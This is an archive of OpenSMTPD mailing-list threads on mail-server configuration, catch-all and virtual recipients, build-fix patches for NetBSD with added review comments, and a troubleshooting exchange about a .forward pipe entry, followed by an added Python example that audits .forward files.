> > 
> > Now with this configuration I only get "550 Invalid recipient" errors,
> > which is expected because OpenSMTPD has no way to know what is a valid
> > sourcehut list recipient.
> > 
> > How can I make OpenSMTPD just skip the recipient verification, and just
> > forward everything to the lmtp socket?
> > 
>
> There are two ways:
>
> 1- synchronize the list of recipients in a recipient table in smtpd, that
>    may be less convenient because you need to have the list of recipients
>    on the SMTP side AND the lmtp side, but... that's the clean way.
>
> 2- you can have a virtual mapping with a catch-all so that all recipients
>    are accepted and passed to the LMTP socket, this works but is not very
>    clean because it will backscatter if LMTP rejects the recipient.
>
>
> > I read about userbase catchall, but my understanding is that userbases
> > maps recipients to a system user, and that seems irrelevant for me as
> > no system user is involved here.
> > 
>
> The userbase feature is to provide an alternate mechanism to resolve the
> usernames to uid, gid and home directory. I don't think it's useful here
> but your comment has hinted me at the issue:
>
> It is inaccurate that no system user is involved here, all recipients do
> resolve into a username because some user has to do the LMTP session. In
> virtual setups, like yours seems to be, the proper way is to create some
> dedicated user and map all recipients to that:
>
>     action sourcehut lmtp "/tmp/lists.forge.mydomain-tls-lmtp.sock" \
>     virtual { "@" = _sourcehut }
>
> In cases where you have a full list of recipients and do not need to get
> virtual mappings involved, you can do:
>
>     action sourcehut lmtp "/tmp/lists.forge.mydomain-tls-lmtp.sock" \
>     user _sourcehut
>


> But no matter what, any action in smtpd.conf is a command that is going
> to get executed and a process has to have a owner, so there is going to
> be a system user involved.
>

Something along these words should be added to the manual somewhere. I think 
that is a common misunderstanding for virtual setups.

Edgar

Re: Auth not working on linux?

2020-01-18 Thread Edgar Pettijohn

On Jan 18, 2020 8:54 AM, Michael Jacob  wrote:
>
> I am trying to setup a opensmtpd server on Arch Linux, the arch package version is 6.6.1p1-2 from 2019-11-06. When I use the "auth" option with "listen on", no authorization with valid system users succeed. But using "auth" with an external table created with smtpctl encrypt does work.
>
> Is this supposed to be working with Linux users and passwords and I am doing something wrong?
> Or does auth only work with OpenBSD users/crypt?
>
Check it was built with PAM support and PAM is set up.
Edgar


[patches] remove warnings from build on NetBSD

2020-01-06 Thread Edgar Pettijohn
Remove warnings about strtonum(). Probably a better place for this, but 
not sure where.


diff --git a/openbsd-compat/defines.h b/openbsd-compat/defines.h
index 23fc8ae2..868943cd 100644
--- a/openbsd-compat/defines.h
+++ b/openbsd-compat/defines.h
@@ -491,4 +491,8 @@ typedef uint16_t    in_port_t;
 #define LOG_PERROR 0
 #endif

+#ifdef __NetBSD__
+#define _OPENBSD_SOURCE
+#endif
+
 #endif /* _DEFINES_H */
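
Review bot: `_OPENBSD_SOURCE` is defined at the very end of defines.h (line 491 onward, just before the closing `#endif /* _DEFINES_H */`), so it only affects system headers that are included after this point; a feature-test macro has to be visible before the first system header is pulled in. Suggest moving it to the top of includes.h or passing it from configure via CPPFLAGS on NetBSD, with a one-line comment saying it is there for the strtonum() declaration the message refers to.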

Remove warnings about errc()

diff --git a/openbsd-compat/errc.c b/openbsd-compat/errc.c
index 658a55b4..9132dcb9 100644
--- a/openbsd-compat/errc.c
+++ b/openbsd-compat/errc.c
@@ -21,6 +21,7 @@
 #include "includes.h"

 #ifndef HAVE_ERRC
+#define HAVE_ERRC

 #include 
 #include 
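
Review bot: `#define HAVE_ERRC` is placed inside the `#ifndef HAVE_ERRC` block of errc.c itself, which overrides the configure result for the rest of this file without saying why; the replacement errc() is still compiled, so the define only changes what the headers included below it declare. If the warning comes from a conflicting or duplicate prototype, fix it where the prototype is declared or in the configure check, or at least add a comment here naming the header this is meant to quiet.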

Remove warnings about strtonum()

diff --git a/smtpd/smtp_client.c b/smtpd/smtp_client.c
index 22e79890..70241b0b 100644
--- a/smtpd/smtp_client.c
+++ b/smtpd/smtp_client.c
@@ -16,6 +16,8 @@
  * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
  */

+#include "includes.h"
+
 #include 
 #include 
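
Review bot: including "includes.h" ahead of the system headers in smtp_client.c matches what errc.c does, but the description repeats "Remove warnings about strtonum()" from the defines.h change, so it is unclear whether this include, the `_OPENBSD_SOURCE` define, or both are needed. Please state in the message which warning each change removes, and check whether other files under smtpd/ that call strtonum() are missing the same include.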


Remove warnings about err()


diff --git a/smtpd/util.c b/smtpd/util.c
index eec3a303..5aa08413 100644
--- a/smtpd/util.c
+++ b/smtpd/util.c
@@ -32,6 +32,7 @@
 #include 

 #include 
+#include 
 #include 
 #include 
 #include 
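
Review bot: the include added to util.c for err() is unconditional. The tree ships its own replacement for part of this function family (openbsd-compat/errc.c), so a platform that lacks the header would stop building at this line; guard it with a configure check or let it arrive through includes.h as in the smtp_client.c change.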




RE: Unable to use .forward with snmpd

2019-12-18 Thread Edgar Pettijohn

On Dec 18, 2019 12:50 PM, Юрий Иванов  wrote:
>
> No, it is present.
> I shrank the output to save a little space in the message.
>
> suser@webmail:~$ ll /home/suser/Maildir/.admin     
> total 32
> drwx--  5 suser suser 4096 Dec 16 19:26 ./
> drwx-- 13 suser suser 4096 Dec 18 20:47 ../
> drwx--  2 suser suser 4096 Dec 16 19:26 cur/
> -rw---  1 suser suser   51 Dec 16 19:26 dovecot-uidlist
> -rw---  1 suser suser  872 Dec 16 19:26 dovecot.index.cache
> -rw---  1 suser suser  304 Dec 16 19:26 dovecot.index.log
> -rw---  1 suser suser    0 Dec 16 19:26 maildirfolder
> drwx--  2 suser suser 4096 Dec 16 19:26 new/
> drwx--  2 suser suser 4096 Dec 16 19:26 tmp/
> suser@webmail:~$ ll /home/suser/Maildir/.admin/new/
> total 8
> drwx-- 2 suser suser 4096 Dec 16 19:26 ./
> drwx-- 5 suser suser 4096 Dec 16 19:26 ../
> 
> From: GARDAIS Ionel 
> Sent: December 18, 2019, 20:32
> To: Юрий Иванов 
> Cc: Edgar Pettijohn ; misc 
> Subject: Re: Unable to use .forward with snmpd
>  
> I see no 'new' folder under the 'Maildir/.admin' folder.
> Should you create it by hand ?
> -- 
> Ionel GARDAIS
> Tech'Advantage CIO - IT Team manager
>
> 
> From: "Юрий Иванов" 
> To: "Edgar Pettijohn" , "misc" 
> Sent: Wednesday, December 18, 2019 18:50:30
> Subject: RE: Unable to use .forward with snmpd
>
> I've created directory through regular RoundCube web interface.
> Base directory:
> suser@webmail:~$ ll Maildir/ 
> total 188
> drwx-- 13 suser suser  4096 Dec 18 19:42 ./
> drwxr-xr-x  6 suser suser  4096 Dec 18 09:07 ../
> drwx--  5 suser suser  4096 Dec 18 16:37 .Drafts/
> drwx--  5 suser suser  4096 Dec 18 19:41 .Sent/
> ...
> drwx--  2 suser suser 12288 Dec 18 19:41 cur/
> -rw---  1 suser suser  3311 Dec 18 19:38 dovecot-uidlist
> -rw---  1 suser suser     8 Dec 17 09:42 dovecot-uidvalidity
> -r--r--r--  1 suser suser     0 Dec 10 11:43 dovecot-uidvalidity.5def68bc
> -rw---  1 suser suser  1608 Dec 18 19:37 dovecot.index
> ...
> -rw---  1 suser suser   192 Dec 17 09:42 dovecot.mailbox.log
> drwx--  2 suser suser  4096 Dec 18 18:01 new/
> -rw---  1 suser suser    53 Dec 17 09:42 subscriptions
> drwx--  2 suser suser  4096 Dec 18 18:00 tmp/
>
> Admin dir, that was created via roundcube web interface:
> suser@webmail:~$ ll Maildir/.admin/
> total 32
> drwx--  5 suser suser 4096 Dec 16 19:26 ./
> drwx-- 13 suser suser 4096 Dec 18 19:42 ../
> drwx--  2 suser suser 4096 Dec 16 19:26 cur/
> -rw---  1 suser suser   51 Dec 16 19:26 dovecot-uidlist
> ...
>
> suser@webmail:~$ ll Maildir/.admin/cur/
> total 8
> drwx-- 2 suser suser 4096 Dec 16 19:26 ./
> drwx-- 5 suser suser 4096 Dec 16 19:26 ../
>
> Normal home directory:
> suser@webmail:~$ ll
> total 256
> drwxr-xr-x  6 suser suser   4096 Dec 18 09:07 ./
> drwxr-xr-x 51 root  root    4096 Dec 17 14:36 ../
> -rw---  1 suser suser    875 Dec 16 20:24 .bash_history
> -rw-r--r--  1 suser suser    220 Dec 10 08:46 .bash_logout
> -rw-r--r--  1 suser suser   3771 Dec 10 08:46 .bashrc
> drwx--  2 suser suser   4096 Dec 10 09:15 .cache/
> drwx--  3 suser suser   4096 Dec 10 09:15 .gnupg/
> -rw-r--r--  1 suser suser    807 Dec 10 08:46 .profile
> -rw-r--r--  1 suser suser      0 Dec 10 09:25 .sudo_as_admin_successful
> -rw---  1 root  root    1129 Dec 11 09:42 .viminfo
> drwx-- 13 suser suser   4096 Dec 18 19:42 Maildir/
> 
> From: Edgar Pettijohn 
> Sent: December 18, 2019, 19:28
> To: misc@opensmtpd.org ; Юрий Иванов 
> Subject: Re: Unable to use .forward with snmpd
>  
>
>
> On Dec 18, 2019 8:47 AM, Юрий Иванов  wrote:
> >
> > Hi, I'm using snmpd with roundcube.
> >
> > After creating .forward file I apply chmod 400 .forward, so no errors in my mail.err log.
> > Default permissions leads to generating warn in logs:
> > smtpd[6275]: warn: smtpd: /home/suser/.forward: unsecure file
> >
> > Content is more or less default:
> >
> > ad...@mydomain.com        # anything after # is ignored
> > "|/home/suser/Maildir/.admin/new/"
Probably shouldn't pipe it through a directory.
> >
> > As the result my mail is not working:
> >
> > Dec 18 12:54:33 webmail smtpd[6279]:  mda event=delivery evpid=3b98bdcf411c5f9a from= to= user=suser method=mda delay=3h48m10s result=TempFail stat=Error ("/bin/sh: 1: /home/suser/Maildir/.admin/new/: Permission denied")
> >
>
> What are the permissions for the directory you are forwarding to?
>
> > Thanks in advance
>
>
>
>
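
The two failures in this thread (the "unsecure file" warning and the pipe entry that names a directory) can be checked before smtpd ever runs the file. The following is an added example, not code from the thread or from OpenSMTPD: `audit_forward` and its finding codes are hypothetical names, and the permission policy (regular file, owned by the user or root, not writable by group or others) is an assumption about what is treated as unsecure.

```python
import os
import shlex
import shutil
import stat
import tempfile


def check_pipe_target(command, lineno):
    """Findings for one "|command" entry: the first word must be a runnable program."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return [(lineno, "pipe-unparsable", command)]
    if not argv:
        return [(lineno, "pipe-empty", command)]
    target = argv[0]
    if "/" not in target:
        # Bare command name: resolved through PATH, as the shell would do.
        return [] if shutil.which(target) else [(lineno, "pipe-missing", target)]
    if os.path.isdir(target):
        # The case from the thread: /bin/sh cannot execute a directory.
        return [(lineno, "pipe-to-directory", target)]
    if not os.path.isfile(target):
        return [(lineno, "pipe-missing", target)]
    if not os.access(target, os.X_OK):
        return [(lineno, "pipe-not-executable", target)]
    return []


def audit_forward(path, uid=None):
    """Return (line, code, detail) findings; line 0 refers to the file itself."""
    uid = os.getuid() if uid is None else uid
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        return [(0, "not-regular-file", path)]
    findings = []
    # Assumed policy: owner is the user or root, no group/other write bit.
    if st.st_uid not in (0, uid):
        findings.append((0, "bad-owner", str(st.st_uid)))
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append((0, "unsafe-mode", f"{stat.S_IMODE(st.st_mode):04o}"))
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, raw in enumerate(fh, 1):
            # Everything after '#' is dropped (a '#' inside a command is not handled).
            entry = raw.split("#", 1)[0].strip()
            if len(entry) >= 2 and entry[0] == entry[-1] == '"':
                entry = entry[1:-1].strip()
            if entry.startswith("|"):
                findings.extend(check_pipe_target(entry[1:], lineno))
    return findings


def demo():
    """Constructed sample: a group-writable .forward that pipes to a directory."""
    with tempfile.TemporaryDirectory() as home:
        maildir_new = os.path.join(home, "Maildir", ".admin", "new")
        os.makedirs(maildir_new)
        forward = os.path.join(home, ".forward")
        with open(forward, "w", encoding="utf-8") as fh:
            fh.write("admin@example.org   # anything after # is ignored\n")
            fh.write(f'"|{maildir_new}/"\n')
        os.chmod(forward, 0o664)
        return [(line, code) for line, code, _ in audit_forward(forward)]


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```
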



Re: Unable to use .forward with snmpd

2019-12-18 Thread Edgar Pettijohn



On 2019-12-18 17:28, Edgar Pettijohn wrote:



On Dec 18, 2019 8:47 AM, Юрий Иванов  wrote:
>
> Hi, I'm using snmpd with roundcube.
>
> After creating .forward file I apply chmod 400 .forward, so no errors in my mail.err log.

> Default permissions leads to generating warn in logs:
> smtpd[6275]: warn: smtpd: /home/suser/.forward: unsecure file
>
> Content is more or less default:
>
> ad...@mydomain.com        # anything after # is ignored
> "|/home/suser/Maildir/.admin/new/"



Probably shouldn't try piping it through a directory.



>
> As the result my mail is not working:
>
> Dec 18 12:54:33 webmail smtpd[6279]:  mda event=delivery evpid=3b98bdcf411c5f9a from= to= user=suser method=mda delay=3h48m10s result=TempFail stat=Error ("/bin/sh: 1: /home/suser/Maildir/.admin/new/: Permission denied")

>

What are the permissions for the directory you are forwarding to?

> Thanks in advance





Re: Unable to use .forward with snmpd

2019-12-18 Thread Edgar Pettijohn


On 2019-12-18 18:32, GARDAIS Ionel wrote:

I see no 'new' folder under the 'Maildir/.admin' folder.
Should you create it by hand ?
--
Ionel GARDAIS
Tech'Advantage CIO - IT Team manager



Please attach your smtpd.conf




*From: *"Юрий Иванов" 
*To: *"Edgar Pettijohn" , "misc" 
*Sent: *Wednesday, December 18, 2019 18:50:30
*Subject: *RE: Unable to use .forward with snmpd

I've created directory through regular RoundCube web interface.
Base directory:
suser@webmail:~$ ll Maildir/
total 188
drwx-- 13 suser suser  4096 Dec 18 19:42 ./
drwxr-xr-x  6 suser suser  4096 Dec 18 09:07 ../
drwx--  5 suser suser  4096 Dec 18 16:37 .Drafts/
drwx--  5 suser suser  4096 Dec 18 19:41 .Sent/
...
drwx--  2 suser suser 12288 Dec 18 19:41 cur/
-rw---  1 suser suser  3311 Dec 18 19:38 dovecot-uidlist
-rw---  1 suser suser     8 Dec 17 09:42 dovecot-uidvalidity
-r--r--r--  1 suser suser     0 Dec 10 11:43 dovecot-uidvalidity.5def68bc
-rw---  1 suser suser  1608 Dec 18 19:37 dovecot.index
...
-rw---  1 suser suser   192 Dec 17 09:42 dovecot.mailbox.log
drwx--  2 suser suser  4096 Dec 18 18:01 new/
-rw---  1 suser suser    53 Dec 17 09:42 subscriptions
drwx--  2 suser suser  4096 Dec 18 18:00 tmp/

Admin dir, that was created via roundcube web interface:
suser@webmail:~$ ll Maildir/.admin/
total 32
drwx--  5 suser suser 4096 Dec 16 19:26 ./
drwx-- 13 suser suser 4096 Dec 18 19:42 ../
drwx--  2 suser suser 4096 Dec 16 19:26 cur/
-rw---  1 suser suser   51 Dec 16 19:26 dovecot-uidlist
...

suser@webmail:~$ ll Maildir/.admin/cur/
total 8
drwx-- 2 suser suser 4096 Dec 16 19:26 ./
drwx-- 5 suser suser 4096 Dec 16 19:26 ../

Normal home directory:
suser@webmail:~$ ll
total 256
drwxr-xr-x  6 suser suser   4096 Dec 18 09:07 ./
drwxr-xr-x 51 root  root    4096 Dec 17 14:36 ../
-rw---  1 suser suser    875 Dec 16 20:24 .bash_history
-rw-r--r--  1 suser suser    220 Dec 10 08:46 .bash_logout
-rw-r--r--  1 suser suser   3771 Dec 10 08:46 .bashrc
drwx--  2 suser suser   4096 Dec 10 09:15 .cache/
drwx--  3 suser suser   4096 Dec 10 09:15 .gnupg/
-rw-r--r--  1 suser suser    807 Dec 10 08:46 .profile
-rw-r--r--  1 suser suser      0 Dec 10 09:25 .sudo_as_admin_successful
-rw---  1 root  root    1129 Dec 11 09:42 .viminfo
drwx-- 13 suser suser   4096 Dec 18 19:42 Maildir/
----
*From:* Edgar Pettijohn 
*Sent:* December 18, 2019, 19:28
*To:* misc@opensmtpd.org ; Юрий Иванов 
*Subject:* Re: Unable to use .forward with snmpd


On Dec 18, 2019 8:47 AM, Юрий Иванов  wrote:
>
> Hi, I'm using snmpd with roundcube.
>
> After creating .forward file I apply chmod 400 .forward, so no errors in my mail.err log.

> Default permissions leads to generating warn in logs:
> smtpd[6275]: warn: smtpd: /home/suser/.forward: unsecure file
>
> Content is more or less default:
>
> ad...@mydomain.com        # anything after # is ignored
> "|/home/suser/Maildir/.admin/new/"
>
> As the result my mail is not working:
>
> Dec 18 12:54:33 webmail smtpd[6279]:  mda event=delivery evpid=3b98bdcf411c5f9a from= to= user=suser method=mda delay=3h48m10s result=TempFail stat=Error ("/bin/sh: 1: /home/suser/Maildir/.admin/new/: Permission denied")

>

What are the permissions for the directory you are forwarding to?

> Thanks in advance






Re: Unable to use .forward with snmpd

2019-12-18 Thread Edgar Pettijohn

On Dec 18, 2019 8:47 AM, Юрий Иванов  wrote:
>
> Hi, I'm using snmpd with roundcube.
>
> After creating .forward file I apply chmod 400 .forward, so no errors in my mail.err log.
> Default permissions leads to generating warn in logs:
> smtpd[6275]: warn: smtpd: /home/suser/.forward: unsecure file
>
> Content is more or less default:
>
> ad...@mydomain.com        # anything after # is ignored
> "|/home/suser/Maildir/.admin/new/"
>
> As the result my mail is not working:
>
> Dec 18 12:54:33 webmail smtpd[6279]:  mda event=delivery evpid=3b98bdcf411c5f9a from= to= user=suser method=mda delay=3h48m10s result=TempFail stat=Error ("/bin/sh: 1: /home/suser/Maildir/.admin/new/: Permission denied")
>
What are the permissions for the directory you are forwarding to?
> Thanks in advance



Re: fix build on netbsd

2019-12-05 Thread Edgar Pettijohn

On Dec 5, 2019 1:06 AM, Gilles Chehade  wrote:
>
> On Wed, Dec 04, 2019 at 07:27:07PM -0600, Edgar Pettijohn wrote:
> > diff --git a/openbsd-compat/openbsd-compat.h
> > b/openbsd-compat/openbsd-compat.h
> > index 6c73e5b5..c7af0135 100644
> > --- a/openbsd-compat/openbsd-compat.h
> > +++ b/openbsd-compat/openbsd-compat.h
> > @@ -122,7 +122,7 @@ int getpeereid(int , uid_t *, gid_t *);
> > ??unsigned int arc4random(void);
> > ??#endif
> > 
> > -#if defined(HAVE_ARC4RANDOM_STIR)
> > +#if !defined(HAVE_ARC4RANDOM_STIR)
> > ??void arc4random_stir(void);
> > ??#elif defined(HAVE_ARC4RANDOM) || defined(LIBRESSL_VERSION_NUMBER)
> > ??/* Recent system/libressl implementation; no need for explicit stir */
> > 
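
Review bot: the changed `#if` line alters which branch every platform takes, not only NetBSD, and the only result reported in this thread is a NetBSD build. Before applying, build on a system where HAVE_ARC4RANDOM_STIR is defined, since that configuration now skips the `void arc4random_stir(void);` prototype and lands in the `#elif` branch.
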
>
> with this, your build is fixed ?
>
> I've been fixing the .c part of openbsd-compat but haven't worked on the
> .h part yet, will have a look at it
>

Yes. Restarted from configure through make install and no problems.

>
>
> -- 
> Gilles Chehade    @poolpOrg
>
> https://www.poolp.org    patreon: https://www.patreon.com/gilles
>


fix build on netbsd

2019-12-04 Thread Edgar Pettijohn
diff --git a/openbsd-compat/openbsd-compat.h 
b/openbsd-compat/openbsd-compat.h

index 6c73e5b5..c7af0135 100644
--- a/openbsd-compat/openbsd-compat.h
+++ b/openbsd-compat/openbsd-compat.h
@@ -122,7 +122,7 @@ int getpeereid(int , uid_t *, gid_t *);
 unsigned int arc4random(void);
 #endif

-#if defined(HAVE_ARC4RANDOM_STIR)
+#if !defined(HAVE_ARC4RANDOM_STIR)
 void arc4random_stir(void);
 #elif defined(HAVE_ARC4RANDOM) || defined(LIBRESSL_VERSION_NUMBER)
 /* Recent system/libressl implementation; no need for explicit stir */
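
Review bot: negating the first test to `#if !defined(HAVE_ARC4RANDOM_STIR)` also changes when the `#elif defined(HAVE_ARC4RANDOM) || defined(LIBRESSL_VERSION_NUMBER)` branch is reached: it now applies only to systems that do have arc4random_stir(), while a recent system or LibreSSL build without it gets the bare prototype instead of the "no need for explicit stir" handling. If the intent is to declare the prototype only when the function is missing, test the recent-implementation case first and make the prototype the fallback, and add a line to the message describing the NetBSD error this fixes.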




Re: Primary Domains vs. Virtual Domains - what's the difference?

2019-11-18 Thread Edgar Pettijohn

On Nov 18, 2019 9:14 AM, Charles Collicutt  wrote:
>
> On 18 Nov 2019, at 13:07, gil...@poolp.org wrote:
> > 
> > With a virtual domain, OpenSMTPD assumes that domain.org == the content of 
> > the virtual table.
> > The virtual mechanism is not optional, the recipient MUST exist in the 
> > table to be valid.
>
> Can virtual users be used with sub-addresses, e.g user+...@virtualdomain.org ?
>

They should work out of the box. Just sent one to myself to double check and it 
went through.

Edgar

> When I tried that (some time ago) it failed saying that the user did not 
> exist.
>
> — 
> Charles
>


Re: Accept mail for all recipients

2019-10-30 Thread Edgar Pettijohn

On Oct 30, 2019 12:02 PM, Sergey Seacher  wrote:
>
> 26.10.2019 19:06, Sergey Seacher wrote:
>
> 26.10.2019 13:51, Reio Remma wrote:
>
> On 26/10/2019 13:35, Sergey Seacher wrote:
>
> Hello!
>
> How can I make, opensmtpd accept mail for all recipients: that are present in the file /etc/opensmtpd/aliases and that are not present?
> I had the rule in my /etc/opensmtpd/smtpd.conf file:
>>
>> accept \
>>    from any \
>>    for domain domain.ltd alias  \
>>    deliver to lmtp "/run/dovecot/lmtp" rcpt-to
>
> I have changed this rule to:
>>
>> accept \
>>    from any \
>>    for domain domain.ltd \
>>    deliver to lmtp "/run/dovecot/lmtp" rcpt-to
>
> Now, if I send to any recipient in my domain, for example rggg...@domain.ltd, I receive error 550, but I need mail to be delivered to i...@domain.ltd 
> Do you mean a catch all alias? Try adding to your aliases file:
>
> @domain.ltd i...@domain.ltd
>
> And re-add alias  to your accept rule.
>
> Thanks! Also I have changed table aliases to table vusers. It works.
> Not working again.
> The contents of the file /etc/opensmtpd/aliases:
>>
>> info              smtpd
>> @domain.ltd    i...@domain.ltd
>
> Rule in the file /etc/opensmtpd/smtpd.conf:
>>
>> accept \
>>    from any \
>>    for domain domain.ltd alias  \
>>    deliver to lmtp "/run/dovecot/lmtp" rcpt-to
>
> I sent an email to rggg...@domain.ltd and I got an error in log:
>>
>> ac73a7d6da66117e smtp event=connected address=209.85.208.173 host=mail-lj1-f173.google.com
>> ac73a7d6da66117e smtp event=failed-command address=209.85.208.173 host=mail-lj1-f173.google.com command="RCPT TO:" result="550 Invalid recipient"
>> ac73a7d6da66117e smtp event=closed address=209.85.208.173 host=mail-lj1-f173.google.com reason=quit
>
> Then I renamed the file /etc/opensmtpd/aliases to /etc/opensmtpd/vusers and changed the rule to:
>>
>> accept \
>>    from any \
>>    for domain domain.ltd virtual  \
>>    deliver to lmtp "/run/dovecot/lmtp" rcpt-to
>
> And now I get an error:
>>
>> e85fb8ffeed306b1 smtp event=connected address=209.85.167.50 host=mail-lf1-f50.google.com
>> e85fb8ffeed306b1 smtp event=message address=209.85.167.50 host=mail-lf1-f50.google.com msgid=7d1551d1 from= to= size=2904 ndest=1 proto=ESMTP
>> e85fb8ffeed306b1 smtp event=closed address=209.85.167.50 host=mail-lf1-f50.google.com reason=quit
>>  mda event=delivery evpid=7d1551d1e9537f74 from= to= rcpt=, user=smtpd method=lmtp delay=0s result=TempFail stat=Error ("RCPT TO rejected: 550 5.1.1  User doesn't exist: smtpd")
>
$ grep smtpd /etc/passwd
Edgar
> -- 
>
> Sergey


Re: Docker build is failing

2019-10-10 Thread Edgar Pettijohn
Kinda curious what the config.h looks like after you run configure.
On Oct 10, 2019 2:04 PM, Ihor Antonov  wrote:
>
> On Thu, 2019-10-10 at 14:46 -0400, Ihor Antonov wrote:
> > Docker build of portable branch is broken, and has been for a while
> > now. I discovered this while trying to test out Gilles' rspamd
> > plugin,
> > which requires latest 6.6 version
> > 
> > I am not a C developer, but from the error it a bit of googling it
> > looks like stuff from openbsd-compat/ is conflicting with some system
> > libraries. 
> > 
> > I did some bisecting and last good commit (in regards of Dockerfile
> > ) 
> > which was a while ago.
> > 
> > > Commit 9f6b7cc1b14624f919a6a9d7ac5a2ded002b2707
> > > Author: Arthur Moore 
> > > Date:   Wed Feb 20 22:20:56 2019 -0500
> > > 
> > >    Add an automated test to check if TLS certificates work
> > > 
> > >    This should allow Docker Hub to act as a CI platform.
> > 
> > Github Actions CI seems to be working fine, but it uses ubuntu, not
> > alpine.  I am happy to help fix/troubleshoot this but I
> > need  guidance
> > from someone who knows C. I am also interested in building it for
> > Alpine as I need this for my future work.
> > 
> > ---
> > Ihor Antonov
> > 
>
> Forgot to include the link to github issue
> https://github.com/OpenSMTPD/OpenSMTPD/issues/944
>
>


Re: Handling of mailing list (or other non system) accounts

2019-10-05 Thread Edgar Pettijohn
> > 
> > Accepting mails for user known to the system works, but what I haven't
> > thought about, are mailing lists. And probably, also mails to be
> > received in
> > [B]CC could be affected.
> > 
> > As those are not directly addressed to any account known to the system,
> > but
> > f.e "misc@opensmtpd.org", opensmtpd rejects them with an "550 Invalid
> > recipient"

sounds like a good response to me

> > 
> > That is a problem I have currently no idea on how to deal with this.
> > 

I don't understand how not accepting mails that you have no user to accept
is a problem. 


> > Any insights?
> > 

I think you need to provide more information about what you want to happen
and what is happening.

> > Thanks again
> > 
> > Thanks Ede
>

Edgar 



Re: unable to send mail from desktop mail client to remote email addresses

2019-10-03 Thread Edgar Pettijohn
Could you post your config. 
Thanks
On Oct 3, 2019 10:34 AM, Kevin  wrote:
On Thu, Oct 3, 2019 at 12:36 AM Peter N. M. Hansteen  wrote:
On Wed, Oct 02, 2019 at 11:33:58PM -0700, Kevin wrote:
> Hi all,
> 
> Having just followed the setup instructions on Gilles HOWTO page here:
> 
> 
> https://poolp.org/posts/2019-09-14/setting-up-a-mail-server-with-opensmtpd-dovecot-and-rspamd/
> 
> 
> ...I'm unable to send mail from my new OpenSMTPD server on OpenBSD 6.6-beta
> (OpenBSD 6.6-beta (GENERIC) #320: Mon Sep 30 21:24:24 MDT 2019); however,
> other deliveries (and mail retrieval) work.
> 
> The pertinent log message looks like this:
> 
> Oct  2 23:21:33 mx smtpd[25067]: bf1c57bab7fcd344 smtp envelope
> evpid=2c41c5fc4a7e6c06 from= to=
> Oct  2 23:21:33 mx smtpd[25067]: bf1c57bab7fcd344 smtp disconnected
> reason=quit
> Oct  2 23:21:38 mx smtpd[25067]: bf1c57b6b057c6ef mta error
> reason=Connection timeout

Connection timeout sounds very much like your machine is not allowed to send 
outgoing mail via SMTP. Check for firewalls and the like.

Also,

[Thu Oct 03 09:24:37] peter@skapet:~$ host example.app
Host example.app not found: 3(NXDOMAIN)
[Thu Oct 03 09:24:43] peter@skapet:~$ host mx.example.app
Host mx.example.app not found: 3(NXDOMAIN)

Among the things you need in order to deliver mail, a valid domain is in 
the top few. I think the basic requirements are indeed listed in the article
(under "Requirements"), please go back and re-read, check that you have
all of those set up properly.

I can see why you might think that given that I altered the real domain name to example.app. (I know it's frowned upon; I only did it because this is a new machine with a setup hobbling along. Bad Kevin... bad...)

In any event, I'm *sure* the domain DNS part is right as I can _receive_ email just fine, including from the same @gmail address I'm writing this from, ergo, DNS resolution of the real domain (and its MX record) are fine.

As for pf being the issue; it's disabled.

# pfctl -s info
Status: Disabled for 0 days 08:23:56             Debug: err

Latest, greatest kernel running:

$ dmesg | grep Open | tail -1
    OpenBSD 6.6 (GENERIC) #326: Wed Oct  2 22:34:33 MDT 2019

One of the things that's puzzling is this part of the log:

smtp disconnected reason=quit.

If I can send the domain email, if I can retrieve email via Dovecot, if I can send mail to myself from the server's CLI (and even retrieve it remotely via my mail client), it seems like there's some knob missing that says, "All auth'd users to relay," yet, I've copied-and-pasted Gilles' rules (and edited them for my own domain), and it am no workie.

Is there perhaps something else akin to the forwarding knob that lets PF forward packets between interfaces that either I've forgotten or was skipped in the HOWTO?

Thanks,
Kevin


Re: need help

2019-09-30 Thread Edgar Pettijohn

On Sep 30, 2019 9:10 AM, Reio Remma  wrote:
>
> On 30/09/2019 16:55, gil...@poolp.org wrote:
> > Hello,
> >
> > I'd like to bring native support for SPF in OpenSMTPD in a future release,
> > but for this I need a bit of help to make sure my SPF resolver works fine.
> >
> > I have created a repository with a standalone executable that performs the
> > SPF lookup and checks if an IP address is allowed to send on behalf of the
> > sending domain:
> >
> > https://github.com/poolpOrg/spf
> >
> > https://github.com/poolpOrg/spf/blob/master/README.md
> >
> >
> > If you could test and report issues, it would be nice,
> >
>
> Is it OpenBSD only atm?
>
> On CentOS 7:
>
> $ make
> Makefile:26: *** missing separator.  Stop.
>
> Reio
>
>

Looking at the makefile. My guess is yes, but you could try bmake and see if it 
gets further.

Edgar

Re: Senders based relaying & authentication

2019-09-26 Thread Edgar Pettijohn
It's the first example in smtpd.conf(5).

Edgar
On Sep 26, 2019 8:43 AM, john philip  wrote:
>
> Hello everybody.
> I'm new to the list :-)
>
> Postfix has senders-dependent routing and authentication.
>
> How to do senders-based relaying & authentication as Postfix
> to different smart hosts?
>
> On a laptop, for example:
>
> us...@isp1.com => smtp.isp1.com:465
> us...@isp1.com => smtp.isp1.com:465
>
> us...@isp2.com => smtp.isp2.com:587
> us...@isp3.com => smtp.isp3.com:465
> ..
>
> Thanks in advance.
>
> -- 
> john
>


Re: table-passwd

2019-09-23 Thread Edgar Pettijohn

On Sep 23, 2019 11:58 AM, Joerg Jung  wrote:
>
>
>
> > On 18. Sep 2019, at 09:38, gil...@poolp.org wrote:
> > 
> > September 17, 2019 11:41 PM, "Edgar Pettijohn"  
> > wrote:
> > 
> >> On Sep 17, 2019 9:05 AM, Gilles Chehade  wrote:
> >> 
> >>> Hello,
> >>> 
> >>> Is there anyone using table-passwd for _any_ other purposes than sharing
> >>> with Dovecot ?
> >>> 
> >>> I have built a fully virtual setup which shares credentials with Dovecot
> >>> and since I managed to do it _without_ table-passwd I'm wondering if the
> >>> table backend is really useful and if it was not created because someone
> >>> had overlooked the first few lines of the Dovecot documentation stating:
> >>> 
> >>> "For a password database, it's enough to have only the user and password
> >>> fields."
> >>> 
> >> 
> >> Not actually using it, but for dovecot to use it as a userdb as well as a 
> >> passdb it needs the
> >> additional fields.
> >> 
> > 
> > ok so I'm misunderstanding the use-case, let me explain why I'm curious:
> > 
> > I wrote table-passwd because I was told that if you wanted to create a 
> > virtual setup,
